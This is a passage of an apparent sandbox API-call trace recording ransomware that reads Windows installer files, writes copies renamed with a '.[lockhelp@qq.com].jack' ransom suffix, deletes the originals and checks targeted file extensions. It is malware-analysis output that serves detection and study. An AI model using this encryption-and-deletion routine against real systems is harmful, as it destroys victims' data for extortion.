(hObject=0x3f8) returned 1 [0198.182] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x86.msi")) returned 0x80 [0198.182] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x86.msi.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x86.msi.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0198.182] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8 [0198.182] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.182] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0198.182] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x86.msi.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x86.msi.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0198.182] GetLastError () returned 0x0 [0198.183] ReadFile (in: hFile=0x3f8, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0xffff0, lpOverlapped=0x0) returned 1 [0198.212] WriteFile (in: hFile=0x41c, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0xffff0, lpOverlapped=0x0) returned 1 [0198.521] ReadFile (in: hFile=0x3f8, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x1c010, lpOverlapped=0x0) returned 1 [0198.536] WriteFile (in: hFile=0x41c, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x1c020, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x1c020, lpOverlapped=0x0) returned 1 [0198.851] ReadFile (in: hFile=0x3f8, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x0, lpOverlapped=0x0) returned 1 [0198.851] WriteFile (in: hFile=0x41c, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0xf8, lpOverlapped=0x0) returned 1 [0198.851] SetEndOfFile (hFile=0x41c) returned 1 [0198.851] CloseHandle (hObject=0x41c) returned 1 [0199.110] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.110] SetEndOfFile (hFile=0x3f8) returned 1 [0199.120] CloseHandle (hObject=0x3f8) returned 1 [0199.120] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x86.msi.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0199.120] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x86.msi")) returned 1 [0199.121] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 40 [0199.121] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 40 [0199.121] lstrlenW (lpString=".doc") returned 4 [0199.121] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0199.121] lstrlenW (lpString=".docx") returned 5 [0199.121] lstrcmpiW (lpString1=".docx", lpString2="6.msi") returned -1 [0199.121] lstrlenW (lpString=".pdf") returned 4 [0199.121] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0199.121] lstrlenW (lpString=".xls") returned 4 [0199.121] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0199.121] lstrlenW (lpString=".xlsx") returned 5 [0199.121] lstrcmpiW (lpString1=".xlsx", lpString2="6.msi") returned -1 [0199.121] lstrlenW (lpString=".ppt") returned 4 [0199.121] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0199.121] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 40 [0199.121] lstrlenW (lpString=".zip") returned 4 [0199.121] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0199.121] lstrlenW (lpString=".rar") returned 4 [0199.121] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0199.121] lstrlenW (lpString=".bz2") returned 4 [0199.121] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0199.121] lstrlenW (lpString=".7z") returned 3 [0199.122] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0199.122] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 40 [0199.122] lstrlenW (lpString=".dbf") returned 4 [0199.122] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0199.122] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 40 [0199.122] lstrlenW (lpString=".1cd") returned 4 [0199.122] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0199.122] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 40 [0199.122] lstrlenW (lpString=".jpg") returned 4 [0199.122] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0199.122] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 40 [0199.122] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 40 [0199.122] lstrlenW (lpString=".doc") returned 4 [0199.122] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0199.122] lstrlenW (lpString=".docx") returned 5 [0199.122] lstrcmpiW (lpString1=".docx", lpString2="6.msi") returned -1 [0199.122] lstrlenW (lpString=".pdf") returned 4 [0199.122] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0199.122] lstrlenW (lpString=".xls") returned 4 [0199.122] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0199.123] lstrlenW (lpString=".xlsx") returned 5 [0199.123] lstrcmpiW (lpString1=".xlsx", lpString2="6.msi") returned -1 [0199.123] lstrlenW (lpString=".ppt") returned 4 [0199.123] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0199.123] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 40 [0199.123] lstrlenW (lpString=".zip") returned 4 [0199.123] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0199.123] lstrlenW (lpString=".rar") returned 4 [0199.123] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0199.123] lstrlenW (lpString=".bz2") returned 4 [0199.123] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0199.123] lstrlenW (lpString=".7z") returned 3 [0199.123] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0199.123] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 40 [0199.123] lstrlenW (lpString=".dbf") returned 4 [0199.123] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0199.123] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 40 [0199.123] lstrlenW (lpString=".1cd") returned 4 [0199.123] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0199.123] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 40 [0199.123] lstrlenW (lpString=".jpg") returned 4 [0199.123] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0199.123] lstrcmpiW (lpString1=".msi", lpString2=".jack") returned 1 [0199.124] lstrlenW (lpString="netfx_Extended_x86.msi") returned 22 [0199.124] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8 [0199.124] GetFileSizeEx (in: hFile=0x3f8, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=495616) returned 1 [0199.124] CloseHandle (hObject=0x3f8) returned 1 [0199.124] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi")) returned 0x80 [0199.124] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0199.124] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8 [0199.124] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.124] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.124] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0199.125] GetLastError () returned 0x0 [0199.125] ReadFile (in: hFile=0x3f8, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x79000, lpOverlapped=0x0) returned 1 [0199.136] WriteFile (in: hFile=0x420, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x79010, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x79010, lpOverlapped=0x0) returned 1 [0199.541] ReadFile (in: hFile=0x3f8, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x0, lpOverlapped=0x0) returned 1 [0199.541] WriteFile (in: hFile=0x420, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x100, lpOverlapped=0x0) returned 1 [0199.541] SetEndOfFile (hFile=0x420) returned 1 [0199.541] CloseHandle (hObject=0x420) returned 1 [0199.563] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.563] SetEndOfFile (hFile=0x3f8) returned 1 [0199.588] CloseHandle (hObject=0x3f8) returned 1 [0199.589] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0199.589] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi")) returned 1 [0199.589] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 44 [0199.589] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 44 [0199.589] lstrlenW (lpString=".doc") returned 4 [0199.589] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0199.589] lstrlenW (lpString=".docx") returned 5 [0199.589] lstrcmpiW (lpString1=".docx", lpString2="6.msi") returned -1 [0199.590] lstrlenW (lpString=".pdf") returned 4 [0199.590] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0199.590] lstrlenW (lpString=".xls") returned 4 [0199.590] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0199.590] lstrlenW (lpString=".xlsx") returned 5 [0199.590] lstrcmpiW (lpString1=".xlsx", lpString2="6.msi") returned -1 [0199.590] lstrlenW (lpString=".ppt") returned 4 [0199.590] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0199.590] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 44 [0199.590] lstrlenW (lpString=".zip") returned 4 [0199.590] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0199.590] lstrlenW (lpString=".rar") returned 4 [0199.590] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0199.590] lstrlenW (lpString=".bz2") returned 4 [0199.590] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0199.590] lstrlenW (lpString=".7z") returned 3 [0199.590] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0199.590] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 44 [0199.590] lstrlenW (lpString=".dbf") returned 4 [0199.590] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0199.590] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 44 [0199.590] lstrlenW (lpString=".1cd") returned 4 [0199.590] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0199.590] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 44 [0199.591] lstrlenW (lpString=".jpg") returned 4 [0199.591] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0199.591] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 44 [0199.591] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 44 [0199.591] lstrlenW (lpString=".doc") returned 4 [0199.591] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0199.591] lstrlenW (lpString=".docx") returned 5 [0199.591] lstrcmpiW (lpString1=".docx", lpString2="6.msi") returned -1 [0199.591] lstrlenW (lpString=".pdf") returned 4 [0199.591] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0199.591] lstrlenW (lpString=".xls") returned 4 [0199.591] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0199.591] lstrlenW (lpString=".xlsx") returned 5 [0199.591] lstrcmpiW (lpString1=".xlsx", lpString2="6.msi") returned -1 [0199.591] lstrlenW (lpString=".ppt") returned 4 [0199.591] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0199.591] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 44 [0199.591] lstrlenW (lpString=".zip") returned 4 [0199.591] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0199.591] lstrlenW (lpString=".rar") returned 4 [0199.591] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0199.591] lstrlenW (lpString=".bz2") returned 4 [0199.591] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0199.591] lstrlenW (lpString=".7z") returned 3 [0199.591] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0199.591] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 44 [0199.591] lstrlenW (lpString=".dbf") returned 4 [0199.591] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0199.592] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 44 [0199.592] lstrlenW (lpString=".1cd") returned 4 [0199.592] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0199.592] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 44 [0199.592] lstrlenW (lpString=".jpg") returned 4 [0199.592] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0199.592] lstrcmpiW (lpString1=".msi", lpString2=".jack") returned 1 [0199.592] lstrlenW (lpString="RGB9RAST_x64.msi") returned 16 [0199.592] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8 [0199.592] GetFileSizeEx (in: hFile=0x3f8, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=184832) returned 1 [0199.592] CloseHandle (hObject=0x3f8) returned 1 [0199.592] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi")) returned 0x80 [0199.593] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0199.593] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8 [0199.593] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.593] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.593] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0199.593] GetLastError () returned 0x0 [0199.593] ReadFile (in: hFile=0x3f8, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x2d200, lpOverlapped=0x0) returned 1 [0199.865] WriteFile (in: hFile=0x420, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x2d210, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x2d210, lpOverlapped=0x0) returned 1 [0199.879] ReadFile (in: hFile=0x3f8, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x0, lpOverlapped=0x0) returned 1 [0199.879] WriteFile (in: hFile=0x420, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0xf4, lpOverlapped=0x0) returned 1 [0199.879] SetEndOfFile (hFile=0x420) returned 1 [0199.880] CloseHandle (hObject=0x420) returned 1 [0199.884] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.884] SetEndOfFile (hFile=0x3f8) returned 1 [0199.886] CloseHandle (hObject=0x3f8) returned 1 [0199.887] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0199.888] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi")) returned 1 [0199.889] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 38 [0199.889] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 38 [0199.889] lstrlenW (lpString=".doc") returned 4 [0199.889] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0199.889] lstrlenW (lpString=".docx") returned 5 [0199.889] lstrcmpiW (lpString1=".docx", lpString2="4.msi") returned -1 [0199.889] lstrlenW (lpString=".pdf") returned 4 [0199.889] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0199.889] lstrlenW (lpString=".xls") returned 4 [0199.942] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0199.942] lstrlenW (lpString=".xlsx") returned 5 [0199.942] lstrcmpiW (lpString1=".xlsx", lpString2="4.msi") returned -1 [0199.942] lstrlenW (lpString=".ppt") returned 4 [0199.942] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0199.942] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 38 [0199.942] lstrlenW (lpString=".zip") returned 4 [0199.942] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0199.942] lstrlenW (lpString=".rar") returned 4 [0199.942] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0199.942] lstrlenW (lpString=".bz2") returned 4 [0199.942] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0199.942] lstrlenW (lpString=".7z") returned 3 [0199.942] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0199.942] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 38 [0199.942] lstrlenW (lpString=".dbf") returned 4 [0199.942] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0199.943] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 38 [0199.943] lstrlenW (lpString=".1cd") returned 4 [0199.943] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0199.943] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 38 [0199.943] lstrlenW (lpString=".jpg") returned 4 [0199.943] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0199.943] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 38 [0199.943] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 38 [0199.943] lstrlenW (lpString=".doc") returned 4 [0199.943] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0199.943] lstrlenW (lpString=".docx") returned 5 [0199.943] lstrcmpiW (lpString1=".docx", lpString2="4.msi") returned -1 [0199.943] lstrlenW (lpString=".pdf") returned 4 [0199.943] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0199.943] lstrlenW (lpString=".xls") returned 4 [0199.943] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0199.943] lstrlenW (lpString=".xlsx") returned 5 [0199.943] lstrcmpiW (lpString1=".xlsx", lpString2="4.msi") returned -1 [0199.943] lstrlenW (lpString=".ppt") returned 4 [0199.943] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0199.943] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 38 [0199.943] lstrlenW (lpString=".zip") returned 4 [0199.943] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0199.943] lstrlenW (lpString=".rar") returned 4 [0199.943] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0199.943] lstrlenW (lpString=".bz2") returned 4 [0199.943] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0199.944] lstrlenW (lpString=".7z") returned 3 [0199.944] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0199.944] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 38 [0199.944] lstrlenW (lpString=".dbf") returned 4 [0199.944] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0199.944] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 38 [0199.944] lstrlenW (lpString=".1cd") returned 4 [0199.944] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0199.944] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 38 [0199.944] lstrlenW (lpString=".jpg") returned 4 [0199.944] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0199.944] lstrcmpiW (lpString1=".msi", lpString2=".jack") returned 1 [0199.944] lstrlenW (lpString="RGB9Rast_x86.msi") returned 16 [0199.944] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0199.944] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=94720) returned 1 [0199.944] CloseHandle (hObject=0x438) returned 1 [0199.945] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi")) returned 0x80 [0199.945] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0199.945] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0199.945] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.945] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0199.945] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0199.945] GetLastError () returned 0x0 [0199.945] ReadFile (in: hFile=0x438, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x17200, lpOverlapped=0x0) returned 1 [0199.949] WriteFile (in: hFile=0x43c, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x17210, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x17210, lpOverlapped=0x0) returned 1 [0199.951] ReadFile (in: 